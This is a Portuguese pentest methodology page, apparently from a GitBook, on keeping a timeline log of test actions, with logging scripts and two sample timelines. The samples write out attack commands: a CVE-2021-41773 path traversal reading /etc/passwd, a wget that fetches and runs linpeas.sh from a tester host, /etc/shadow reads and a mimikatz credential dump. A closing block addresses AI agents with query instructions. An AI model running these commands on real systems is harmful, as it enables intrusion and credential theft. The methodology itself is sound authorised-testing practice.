# Gestão de Linha do Tempo (Timeline de Teste) ### **📋 ÍNDICE** 1. Fundamento e Filosofia 2. Estrutura da Timeline 3. O que Registrar e o que Ignorar 4. Fluxo de Trabalho (Workflow) 5. Automação e Ferramentas 6. Exemplo Prático de Timeline 7. Integração com o Relatório Final 8. Checklist de Timeline *** ### 🎯 **1. FUNDAMENTO E FILOSOFIA** #### **1.1 O que é a Timeline de Teste?** ```yaml DEFINIÇÃO: A timeline é o registro cronológico, imutável e detalhado de todas as ações de impacto executadas durante o engajamento de pentest. ANALOGIA: É a CAIXA PRETA de uma aeronave. Não registra cada respiração do piloto, mas registra CADA evento crítico que explica o que aconteceu, quando aconteceu e por que aconteceu. DIFERENÇA CRÍTICA: Logs de ferramentas (Nmap, Burp, Metasploit) são o "combustível". A timeline é o "painel de instrumentos". Um sem o outro não conta a história completa. ``` #### **1.2 Por que a Timeline está nos MÉTODOS?** ```yaml TRÊS RAZÕES FUNDAMENTAIS: 1. PROVA CONTRA ALEGAÇÕES: "Vocês derrubaram nosso servidor de produção!" Sem timeline: "Não foi a gente" (alegação contra alegação) Com timeline: "Às 14:32:17, estávamos escaneando o IP 10.0.0.45. O servidor X está em 10.0.0.99. Não fomos nós." 2. BASE DO RELATÓRIO FINAL: Escrever o relatório do zero é lento e propenso a erros. A timeline já é um rascunho cronológico do teste. Basta formatar e enriquecer. 3. REPRODUTIBILIDADE: "Como você conseguiu aquela shell?" Sem timeline: "Ah, foi com um exploit... não lembro qual" Com timeline: "Às 15:22, usei o exploit CVE-2024-1234 com payload X" ``` #### **1.3 O Problema da Memória Humana** ```yaml A REALIDADE: Você executou 200 comandos hoje. Daqui a 7 dias, vai lembrar de: - O que funcionou (o exploit) - O que quebrou (o servidor que caiu) - O que foi crítico (o dump de credenciais) Você NÃO vai lembrar de: - O horário exato de cada descoberta - A sequência exata de comandos - Quais IPs foram escaneados quando - Qual payload específico funcionou A SOLUÇÃO: Registre no momento. 10 segundos agora = 1 hora de caça depois. ``` #### **1.4 O Valor Estratégico da Timeline** ```yaml PARA O PENTESTER: ✅ Prova contra alegações de danos colaterais ✅ Base para reprodução de vulnerabilidades ✅ Rascunho do relatório final ✅ Histórico para aprendizado pós-projeto PARA A EQUIPE: ✅ Permite handoff limpo ("pegue daqui e continue") ✅ Facilita revisão por pares ✅ Cria trilha de auditoria compartilhada ✅ Acelera onboarding em projetos longos PARA O CLIENTE: ✅ Transparência total das ações ✅ Confiança na competência do time ✅ Evidência de escopo cumprido ✅ Relatório mais rápido e preciso ``` *** ### 🏗️ **2. ESTRUTURA DA TIMELINE** #### **2.1 Localização Obrigatória** ``` [YYYY-MM-DD]_[NOME_CLIENTE]_[ID_PROJETO]/ │ ├── 04_EVIDENCE/ │ ├── screenshots/ │ ├── hashes/ │ ├── credentials/ │ └── timeline.md ← OBRIGATÓRIO. Arquivo único de timeline. ``` #### **2.2 Formato Padrão de Registro** ````markdown # Timeline de Teste - [NOME_CLIENTE] # Projeto: [YYYY-MM-DD]_[CLIENTE]_[ID] # Analista: [NOME] # Início: [DATA/HORA] # Término: [DATA/HORA] --- ## [YYYY-MM-DD] ### [HH:MM] - [FASE] - [AÇÃO PRINCIPAL] **Descrição:** [O que foi feito] **Ferramenta:** [Nome da ferramenta] **Alvo:** [IP/Domínio/Endpoint] **Comando/Payload:** ```bash comando utilizado ou payload ```` **Resultado:** \[O que foi obtido] **Evidência:** `04_EVIDENCE/screenshots/[nome_do_arquivo].png` **Observações:** \[Contexto adicional, se necessário] *** #### **2.3 Template Resumido (para registros rápidos)** ````markdown ``` ### [HH:MM] - [FASE] - [AÇÃO] - **Alvo:** [IP/Domínio] - **Ferramenta:** [Nome] - **Resultado:** [Resumo] - **Evidência:** `[caminho]` ``` ```` #### **2.4 Exemplo de Timeline Preenchida** ````markdown # Timeline de Teste - Empresa ABC # Projeto: 2024-01-15_EmpresaABC_001 # Analista: João Silva # Início: 2024-01-15 09:00 # Término: 2024-01-17 18:30 --- ## 2024-01-15 ### 09:15 - RECON - Scan de Portas Inicial **Descrição:** Escaneamento SYN completo de todas as portas TCP no range de IPs fornecido. **Ferramenta:** Nmap **Alvo:** 192.168.1.0/24 **Comando:** ```bash nmap -sS -p- -T4 -oA 01_RECON/active/2024-01-15_nmap_full 192.168.1.0/24 ```` **Resultado:** 23 hosts ativos identificados. Portas 80, 443, 22, 3389 abertas em múltiplos hosts. **Evidência:** `01_RECON/active/2024-01-15_nmap_full.gnmap` *** #### 10:30 - ENUM - Enumeração de Serviços Web **Descrição:** Identificação de tecnologias e versões nos servidores web encontrados. **Ferramenta:** WhatWeb + Nmap scripts **Alvo:** 192.168.1.10:80, 192.168.1.10:443 **Comando:** ```bash whatweb https://192.168.1.10 nmap -sV --script=http-enum -p 80,443 192.168.1.10 ``` **Resultado:** Apache 2.4.49 identificado (vulnerável a CVE-2021-41773) **Evidência:** `02_ENUMERATION/services.txt` *** #### 14:20 - EXPLOITATION - Exploração CVE-2021-41773 **Descrição:** Tentativa de path traversal no Apache 2.4.49 **Ferramenta:** cURL (manual) **Alvo:** 192.168.1.10:80 **Payload:** ```bash curl -v --path-as-is http://192.168.1.10/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd ``` **Resultado:** Leitura de `/etc/passwd` confirmada. Usuários: root, www-data, admin. **Evidência:** `04_EVIDENCE/screenshots/2024-01-15_path_traversal_poc.png` *** #### 15:45 - EXPLOITATION - Obtenção de Shell **Descrição:** Escalação do path traversal para RCE via CGI **Ferramenta:** Exploit script customizado **Alvo:** 192.168.1.10:80 **Comando:** ```bash python3 exploit.py -t 192.168.1.10 -c "id" ``` **Resultado:** Shell reversa obtida como usuário www-data **Evidência:** `04_EVIDENCE/screenshots/2024-01-15_shell_obtida.png` **Observações:** Shell instável, necessidade de upgrade para TTY *** #### 16:00 - PERSISTENCE - Upgrade de Shell **Descrição:** Estabilização da shell para shell interativa completa **Ferramenta:** Python + socat **Alvo:** 192.168.1.10 **Comando:** ```bash python3 -c 'import pty;pty.spawn("/bin/bash")' # Configuração de TTY no host local stty raw -echo; fg ``` **Resultado:** Shell interativa estável **Observações:** Técnica padrão de upgrade de shell *** ### 2024-01-16 #### 09:30 - PRIVILEGE ESCALATION - Enumeração de Sistema **Descrição:** Identificação de vetores de escalação de privilégio **Ferramenta:** LinPEAS **Alvo:** 192.168.1.10 (www-data) **Comando:** ```bash wget 10.0.0.5/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh ``` **Resultado:** SUID bit em `/usr/bin/screen` (vulnerável a CVE-2017-1000112) **Evidência:** `04_EVIDENCE/linpeas_output.txt` *** #### 11:15 - PRIVILEGE ESCALATION - Exploração CVE-2017-1000112 **Descrição:** Escalação para root via screen SUID **Ferramenta:** Exploit público **Alvo:** 192.168.1.10 **Comando:** ```bash ./exploit_screen.sh ``` **Resultado:** Shell como root obtida **Evidência:** `04_EVIDENCE/screenshots/2024-01-16_root_shell.png` **Observações:** CRÍTICO - acesso root confirmado *** #### 14:00 - PIVOTING - Coleta de Credenciais **Descrição:** Extração de hashes e credenciais do sistema comprometido **Ferramenta:** mimikatz (via shell) **Alvo:** 192.168.1.10 **Comando:** ```bash cat /etc/shadow # Em máquinas Windows: mimikatz.exe "sekurlsa::logonpasswords" exit ``` **Resultado:** Hash do usuário administrador obtido **Evidência:** `04_EVIDENCE/hashes/admin_hash.txt` (CRIPTOGRAFADO) *** #### 16:30 - REPORTING - Documentação **Descrição:** Organização de evidências e início da documentação **Ação:** Screenshots organizados na pasta `04_EVIDENCE/screenshots/` **Status:** 80% das descobertas documentadas *** ### 📝 **3. O QUE REGISTRAR E O QUE IGNORAR** #### **3.1 Obrigatório Registrar (EVENTOS DE IMPACTO)** ````yaml ``` ✅ INÍCIO E TÉRMINO DE FASES: - Início do Recon - Início da Enumeração - Início da Exploração - Início do Pivoting - Término do teste ✅ DESCOBERTAS CRÍTICAS: - Vulnerabilidades confirmadas - Acessos obtidos (shell, admin, database) - Credenciais capturadas - Dados sensíveis acessados ✅ AÇÕES DE RISCO: - Exploração de DoS (avisar antes!) - Tentativas de brute force agressivas - Alterações em sistemas de produção - Qualquer ação que possa causar impacto ✅ COMUNICAÇÕES EXTERNAS: - Contato com cliente - Relato de problemas - Solicitações de whitelist - Notificações de risco iminente ✅ EVENTOS ANÔMALOS: - Queda de serviço (relacionada ou não) - Erros inesperados - Interrupções no teste ```` #### **3.2 Opcional Registrar (ÚTEIS, MAS NÃO CRÍTICOS)** ```yaml 🟡 EXPLORAÇÕES QUE FALHARAM: - Registre se consumiram tempo significativo - Útil para mostrar o que foi tentado 🟡 DESCOBERTAS DE BAIXO RISCO: - Informações de versão sem CVE conhecido - Portas abertas sem serviço identificável 🟡 COMANDOS DE SUPORTE: - Configuração de ambiente - Instalação de ferramentas - Comandos de navegação (ls, cd) ``` #### **3.3 NÃO REGISTRAR (RUIDO)** ```yaml ❌ CADA COMANDO ls/cd/pwd: - Não agrega valor - Polui a timeline ❌ SCANS DE ROTINA (que não descobriram nada): - Registre apenas os que tiveram resultados ❌ EXPLORAÇÕES AUTOMATIZADAS (se falharam rápido): - Exceto se fizeram parte de uma estratégia documentada ❌ INTERAÇÕES COM FERRAMENTAS DE TESTE (setup): - A menos que tenham causado impacto ``` #### **3.4 Matriz de Decisão: Registrar ou Não?** | Cenário | Registrar? | Justificativa | | ---------------------------------- | ---------- | -------------------------------- | | Scan Nmap identificou porta nova | ✅ SIM | Nova superfície de ataque | | Scan Nmap não encontrou nada | ❌ NÃO | Ruído. Não agrega valor. | | Exploit funcionou | ✅ SIM | Marco crítico | | Exploit falhou (mas tentou por 2h) | ✅ SIM | Mostra esforço, evita retrabalho | | Exploit falhou (tentativa rápida) | ❌ NÃO | Desnecessário | | Servidor caiu durante fuzzing | ✅ SIM | Risco, precisa ser justificado | | Você executou `ls -la` | ❌ NÃO | Ruído total | | Você obteve shell | ✅ SIM | Marco crítico | | Você enviou e-mail para o cliente | ✅ SIM | Comunicação externa | *** ### 🔄 **4. FLUXO DE TRABALHO (WORKFLOW)** #### **4.1 Ciclo Diário de Timeline** ```mermaid graph TD A[Início do Turno] --> B[Abrir timeline.md] B --> C[Registrar início do dia] C --> D[Executar ações de teste] D --> E{Evento de impacto?} E -->|Sim| F[Registrar na timeline] E -->|Não| D F --> D D --> G[Fim do turno] G --> H[Registrar fim do dia] H --> I[Fechar arquivo] ``` #### **4.2 Workflow Detalhado** ```yaml PASSO 1 - PREPARAÇÃO (Início do dia): 1. Abrir arquivo `04_EVIDENCE/timeline.md` 2. Registrar horário de início 3. Registrar plano de ações do dia (opcional, mas recomendado) PASSO 2 - EXECUÇÃO (Durante o teste): 1. Para cada ação planejada, executar 2. Se resultado for relevante → REGISTRAR 3. Se resultado for irrelevante → IGNORAR 4. Registrar também eventos inesperados PASSO 3 - REVISÃO (Fim do dia): 1. Revisar entradas do dia 2. Complementar detalhes esquecidos 3. Registrar horário de término 4. Verificar se evidências estão linkadas PASSO 4 - PÓS-PROJETO (Antes do relatório): 1. Revisar timeline completa 2. Corrigir inconsistências 3. Garantir que todos os eventos críticos estão registrados 4. Usar como base para o relatório ``` #### **4.3 Integração com o Kanban** ```yaml RELAÇÃO COM O QUADRO KANBAN: Cada item movido no Kanban deve ter um registro na timeline. A timeline é a "prova" de que o item foi realmente tratado. EXEMPLO: Kanban: Mover "Porta 443 (Apache)" de ENUM para EXPLOITATION Timeline: Registrar "Iniciada exploração do Apache 2.4.49 em 192.168.1.10" ``` *** ### 🤖 **5. AUTOMAÇÃO E FERRAMENTAS** #### **5.1 Alias de Automação (.bashrc / .zshrc)** ````bash # ============================================ # TIMELINE MANAGEMENT - PLOR-PT # ============================================ # Função principal para registrar eventos log_event() { local DATA=$(date '+%Y-%m-%d %H:%M') local FASE="$1" local ACAO="$2" local ALVO="$3" local RESULTADO="$4" # Verifica se estamos em um diretório de projeto if [ ! -d "04_EVIDENCE" ]; then echo "❌ Erro: Você não está em um diretório de projeto válido (falta pasta 04_EVIDENCE)" return 1 fi # Registra no arquivo de timeline echo "" >> 04_EVIDENCE/timeline.md echo "### $DATA - $FASE - $ACAO" >> 04_EVIDENCE/timeline.md echo "" >> 04_EVIDENCE/timeline.md echo "**Alvo:** $ALVO" >> 04_EVIDENCE/timeline.md echo "**Resultado:** $RESULTADO" >> 04_EVIDENCE/timeline.md echo "" >> 04_EVIDENCE/timeline.md echo "✅ [$DATA] Evento registrado na timeline" } # Função para registrar comandos longos log_command() { local DATA=$(date '+%Y-%m-%d %H:%M') local FASE="$1" local DESCRICAO="$2" local COMANDO="$3" local ALVO="$4" if [ ! -d "04_EVIDENCE" ]; then echo "❌ Erro: Você não está em um diretório de projeto válido" return 1 fi echo "" >> 04_EVIDENCE/timeline.md echo "### $DATA - $FASE - $DESCRICAO" >> 04_EVIDENCE/timeline.md echo "" >> 04_EVIDENCE/timeline.md echo "**Alvo:** $ALVO" >> 04_EVIDENCE/timeline.md echo "**Comando:**" >> 04_EVIDENCE/timeline.md echo '```bash' >> 04_EVIDENCE/timeline.md echo "$COMANDO" >> 04_EVIDENCE/timeline.md echo '```' >> 04_EVIDENCE/timeline.md echo "" >> 04_EVIDENCE/timeline.md echo "✅ [$DATA] Comando registrado na timeline" } # Função para marco de início de fase log_start_phase() { local DATA=$(date '+%Y-%m-%d %H:%M') local FASE="$1" if [ ! -d "04_EVIDENCE" ]; then echo "❌ Erro: Você não está em um diretório de projeto válido" return 1 fi echo "" >> 04_EVIDENCE/timeline.md echo "## 🚀 INÍCIO DA FASE: $FASE - $DATA" >> 04_EVIDENCE/timeline.md echo "" >> 04_EVIDENCE/timeline.md echo "✅ [$DATA] Fase $FASE iniciada" } # Função para marco de fim de fase log_end_phase() { local DATA=$(date '+%Y-%m-%d %H:%M') local FASE="$1" local RESUMO="$2" if [ ! -d "04_EVIDENCE" ]; then echo "❌ Erro: Você não está em um diretório de projeto válido" return 1 fi echo "" >> 04_EVIDENCE/timeline.md echo "## 🏁 TÉRMINO DA FASE: $FASE - $DATA" >> 04_EVIDENCE/timeline.md echo "**Resumo:** $RESUMO" >> 04_EVIDENCE/timeline.md echo "" >> 04_EVIDENCE/timeline.md echo "✅ [$DATA] Fase $FASE finalizada" } # Aliases rápidos alias tl-start='log_start_phase' alias tl-end='log_end_phase' alias tl-event='log_event' alias tl-cmd='log_command' ```` #### **5.2 Script de Inicialização de Timeline** ```bash #!/bin/bash # init_timeline.sh - Inicializa arquivo de timeline init_timeline() { local DATA=$(date '+%Y-%m-%d %H:%M') local ANALISTA="${1:-$(whoami)}" local CLIENTE="${2:-Cliente}" local PROJETO_ID="${3:-001}" cat > 04_EVIDENCE/timeline.md << EOF # Timeline de Teste - $CLIENTE # Projeto: $(date +%Y-%m-%d)_${CLIENTE}_${PROJETO_ID} # Analista: $ANALISTA # Início: $(date '+%Y-%m-%d %H:%M') # Término: Pendente --- ## 📅 $(date '+%Y-%m-%d') ### $(date '+%H:%M') - INÍCIO - Início do Teste **Descrição:** Início do engajamento de pentest **Escopo:** Conforme documento de autorização **Observações:** Timeline iniciada --- EOF echo "✅ Timeline inicializada em 04_EVIDENCE/timeline.md" } # Executar init_timeline "$1" "$2" "$3" ``` #### **5.3 Extensão VS Code (Opcional)** ```json // .vscode/snippets.code-snippets { "Timeline Entry": { "prefix": "tl", "body": [ "### ${CURRENT_HOUR}:${CURRENT_MINUTE} - ${1:FASE} - ${2:AÇÃO}", "", "**Descrição:** ${3:Descrição detalhada}", "**Ferramenta:** ${4:Ferramenta}", "**Alvo:** ${5:IP/Domínio}", "**Resultado:** ${6:Resultado obtido}", "**Evidência:** `${7:caminho/para/evidencia}`", "" ], "description": "Insere entrada formatada na timeline" } } ``` *** ### 📊 **6. EXEMPLO PRÁTICO DE TIMELINE** #### **6.1 Timeline de Projeto Real (Simulação)** ````markdown # Timeline de Teste - TechCorp # Projeto: 2024-06-10_TechCorp_045 # Analista: Rafael S. # Início: 2024-06-10 08:00 # Término: 2024-06-12 17:30 --- ## 🚀 INÍCIO DA FASE: RECON - 2024-06-10 08:15 --- ## 📅 2024-06-10 ### 08:30 - RECON - Scan de Portas Inicial **Descrição:** Escaneamento SYN de portas comuns em range fornecido. **Ferramenta:** Nmap **Alvo:** 10.10.10.0/24 **Comando:** ```bash nmap -sS -p 21,22,80,443,3389,8080 -T4 -oA 01_RECON/active/2024-06-10_nmap_initial 10.10.10.0/24 ```` **Resultado:** 12 hosts ativos. Portas 80 e 443 abertas em 10.10.10.50, 10.10.10.51. *** #### 10:00 - ENUM - Enumeração Web **Descrição:** Identificação de tecnologias nos servidores web. **Ferramenta:** WhatWeb, Nmap scripts **Alvo:** 10.10.10.50:80, 10.10.10.50:443 **Comando:** ```bash whatweb https://10.10.10.50 nmap -sV --script=http-enum -p 80,443 10.10.10.50 ``` **Resultado:** Apache 2.4.49 (vulnerável a CVE-2021-41773) e WordPress 5.8. *** #### 14:30 - EXPLOITATION - Teste CVE-2021-41773 **Descrição:** Tentativa de path traversal para confirmar vulnerabilidade. **Ferramenta:** cURL **Alvo:** 10.10.10.50:80 **Payload:** ```bash curl -v --path-as-is http://10.10.10.50/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd ``` **Resultado:** ✅ LEITURA DE /etc/passwd CONFIRMADA **Evidência:** `04_EVIDENCE/screenshots/2024-06-10_path_traversal.png` *** #### 15:45 - EXPLOITATION - RCE via Path Traversal **Descrição:** Escalação para execução remota de comandos. **Ferramenta:** Exploit script **Alvo:** 10.10.10.50 **Comando:** ```bash python3 CVE-2021-41773.py -t 10.10.10.50 -c "id" ``` **Resultado:** ✅ SHELL OBTIDA como www-data **Evidência:** `04_EVIDENCE/screenshots/2024-06-10_shell_www-data.png` *** ### 🏁 TÉRMINO DA FASE: EXPLOITATION - 2024-06-10 16:00 **Resumo:** Acesso inicial obtido no host 10.10.10.50. Shell como www-data. *** ### 🚀 INÍCIO DA FASE: PRIVILEGE ESCALATION - 2024-06-11 09:00 *** ### 📅 2024-06-11 #### 09:30 - PRIVILEGE ESCALATION - Enumeração de Sistema **Descrição:** Coleta de informações para identificar vetores de escalação. **Ferramenta:** LinPEAS **Alvo:** 10.10.10.50 (www-data) **Comando:** ```bash wget 10.0.0.5/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh ``` **Resultado:** SUID bit em `/usr/bin/screen` (CVE-2017-1000112) *** #### 11:15 - PRIVILEGE ESCALATION - Exploração screen SUID **Descrição:** Escalação para root via vulnerabilidade do screen. **Ferramenta:** Exploit público **Alvo:** 10.10.10.50 **Comando:** ```bash ./exploit_screen.sh ``` **Resultado:** ✅ SHELL COMO ROOT OBTIDA **Evidência:** `04_EVIDENCE/screenshots/2024-06-11_root_shell.png` **Observações:** 🚨 CRÍTICO - Acesso root confirmado *** #### 14:00 - PERSISTENCE - Coleta de Credenciais **Descrição:** Extração de hashes e configurações sensíveis. **Ferramenta:** Comandos nativos **Alvo:** 10.10.10.50 **Comando:** ```bash cat /etc/shadow cat /etc/passwd ``` **Resultado:** Hashes de 5 usuários obtidos **Evidência:** `04_EVIDENCE/hashes/shadow_hashes.txt` (CRIPTOGRAFADO) *** #### 15:30 - COMMUNICATION - Notificação ao Cliente **Descrição:** Comunicação sobre descoberta crítica. **Canal:** E-mail **Conteúdo:** Acesso root confirmado. Recomendação de patch imediato. **Resposta:** Cliente ciente e autorizando continuação do teste. *** ### 🏁 TÉRMINO DA FASE: PRIVILEGE ESCALATION - 2024-06-11 16:00 **Resumo:** Escalação para root concluída. Sistema totalmente comprometido. *** ### 📅 2024-06-12 #### 09:00 - REPORTING - Organização de Evidências **Descrição:** Organização de screenshots e logs para relatório final. **Ação:** Screenshots organizados por vulnerabilidade **Status:** 100% das evidências catalogadas *** #### 14:00 - REPORTING - Início da Documentação **Descrição:** Elaboração do relatório final baseado na timeline. **Ação:** Timeline convertida em rascunho do relatório **Status:** 60% concluído *** #### 17:30 - FIM - Término do Engajamento **Descrição:** Fim das atividades de teste. **Resumo Final:** * Hosts comprometidos: 1 (10.10.10.50) * Vulnerabilidades confirmadas: 4 * Acesso root obtido: Sim * Recomendações: 8 *** ### 📋 7. INTEGRAÇÃO COM O RELATÓRIO FINAL #### **7.1 Como a Timeline Alimenta o Relatório** ```yaml SEÇÃO DO RELATÓRIO → FONTE NA TIMELINE: Metodologia: → Datas de início/término de cada fase → Ferramentas utilizadas (únicas) Cronograma de Testes: → Sequência cronológica das atividades → Marcos e descobertas principais Vulnerabilidades Encontradas: → Data/hora da descoberta → Comando/Payload utilizado → Evidência (link direto) Análise de Risco: → Impacto real observado (via timeline) → Contexto da descoberta Anexos: → Logs e evidências já referenciados ``` #### **7.2 Script de Extração para Relatório** ```bash #!/bin/bash # extract_timeline_for_report.sh - Extrai eventos para relatório extract_for_report() { local TIMELINE="04_EVIDENCE/timeline.md" local OUTPUT="05_REPORTING/draft/timeline_report.md" if [ ! -f "$TIMELINE" ]; then echo "❌ Timeline não encontrada" return 1 fi cat > "$OUTPUT" << EOF # Anexo B - Cronograma de Testes | Data/Hora | Fase | Ação | Alvo | Resultado | |:----------|:-----|:-----|:-----|:-----------| EOF # Extrair linhas com formato de evento grep -E "### [0-9]{2}:[0-9]{2} -" "$TIMELINE" | while read line; do # Extrair hora, fase, ação HORA=$(echo "$line" | grep -oE '[0-9]{2}:[0-9]{2}') FASE=$(echo "$line" | grep -oE ' - [A-Z]+ -' | tr -d ' -') ACAO=$(echo "$line" | grep -oE '- [^|]+$' | sed 's/^- //') # Buscar alvo e resultado nas linhas seguintes ALVO=$(awk "/$line/{flag=1;next}/###/{flag=0}flag" "$TIMELINE" | grep -i "alvo:" | head -1 | sed 's/.*alvo: //i') RESULTADO=$(awk "/$line/{flag=1;next}/###/{flag=0}flag" "$TIMELINE" | grep -i "resultado:" | head -1 | sed 's/.*resultado: //i') echo "| $HORA | $FASE | $ACAO | ${ALVO:-N/A} | ${RESULTADO:-N/A} |" >> "$OUTPUT" done echo "✅ Relatório de timeline extraído para $OUTPUT" } extract_for_report ``` *** ### ✅ **8. CHECKLIST DE TIMELINE** #### **8.1 Checklist Diário** ```markdown ## 📋 CHECKLIST DIÁRIO DE TIMELINE ### INÍCIO DO DIA - [ ] Timeline aberta e visível - [ ] Horário de início registrado - [ ] Plano do dia documentado (opcional) ### DURANTE O TESTE - [ ] Cada nova descoberta foi registrada? - [ ] Cada acesso crítico foi registrado? - [ ] Cada falha relevante foi registrada? - [ ] Evidências foram linkadas? ### FIM DO DIA - [ ] Horário de término registrado - [ ] Revisão das entradas do dia - [ ] Links para evidências verificados - [ ] Timeline salva e versionada (git commit) ### FIM DO PROJETO - [ ] Timeline completa revisada - [ ] Todos os eventos críticos estão presentes - [ ] Datas/horas consistentes - [ ] Pronta para integração com relatório ``` #### **8.2 Checklist de Qualidade** ```yaml ✅ CRITÉRIOS DE QUALIDADE DA TIMELINE: COMPLETUDE: [ ] Todas as fases do teste estão representadas [ ] Todas as descobertas críticas estão registradas [ ] Nenhum evento de impacto ficou de fora CONSISTÊNCIA: [ ] Datas e horas são logicamente sequenciais [ ] Não há sobreposição impossível de horários [ ] Ferramentas e versões são consistentes CLAREZA: [ ] Cada entrada é auto-suficiente [ ] Um leitor externo entende o que foi feito [ ] Termos técnicos são explicados ou padronizados RASTREABILIDADE: [ ] Cada evento crítico tem evidência linkada [ ] Caminhos de arquivos são relativos ao projeto [ ] Commands/payloads são reproduzíveis SEGURANÇA: [ ] Credenciais NUNCA estão na timeline [ ] Dados sensíveis são referenciados, não copiados [ ] Timeline está versionada (git) mas não exposta ``` *** ### 📊 **RESUMO EXECUTIVO** ```yaml TIMELINE DE TESTE - CONCLUSÃO: 🎯 PROPÓSITO: A timeline é a CAIXA PRETA do pentest. Sem ela, você não tem prova do que fez, quando fez ou como fez. 📝 REGRA DE OURO: Registre EVENTOS DE IMPACTO, não comandos triviais. 10 segundos agora = 1 hora depois. 🔧 FERRAMENTAS: Use aliases (`log_event`, `log_command`) para registro rápido. A automação é sua amiga — use-a. 📊 BENEFÍCIOS: ✅ Prova contra alegações de danos colaterais ✅ Base do relatório final (já pronto!) ✅ Reprodutibilidade garantida ✅ Conhecimento retido para projetos futuros ⚠️ NÃO É OPCIONAL: A timeline é MANDATÓRIA para todos os projetos. Clientes pagam por transparência e rastreabilidade. ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xmorte.gitbook.io/bibliadopentestbr/metodos/limpeza-e-organizacao-de-resultados/gestao-de-linha-do-tempo-timeline-de-teste.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.